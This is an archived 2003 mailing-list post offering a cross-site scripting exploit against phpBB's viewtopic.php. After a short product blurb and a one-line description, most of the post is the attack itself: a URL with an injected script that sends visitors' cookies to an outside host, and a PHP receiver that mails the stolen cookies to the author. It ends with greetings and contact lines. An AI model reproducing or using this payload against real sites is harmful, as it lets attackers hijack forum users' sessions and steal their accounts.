('binary' encoding is not supported, stored as-is) XSS Exploit In phpBB viewtopic.php A: BACKGROUND [from phpbb.com] phpBB is a high powered, fully scalable, and highly customisable open- source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. B: DESCRIPTION The cross site scripting allow you to print a html or javascript or others in the webpage when it just open not write in the page. C: EXPLOIT This is the URLs of the exploit: http://[site]/phpBB/viewtopic.php?topic_id=[script] And you can steal cookie by changing [script] to <script>document.location='http://any-web- site/cookies.php?'+document.cookie</script> and in http://any-web-site/cookie.php put ----------------cookie.php------------------- <? mail("silentneedleat_private","cookies from phpbb",$http_cookie); echo $http_cookie; //or you can send with the variable name ?> ----------------------------------------------- D: GREETZ To : SP.IC , DR^^FUNNY , ARAB-HAK , ZALABOZA , 7azm , King Of Ray , OH SHE IS A LITTLE RUN AWAY[puretone & kelly osbourne] :) and thanks to the last exploit in phpbb :) E: CONTACT Silent Needle silentneedleat_private F: OH LONG NIGHT Bye
This archive was generated by hypermail 2b30 : Mon Jun 23 2003 - 13:43:20 PDT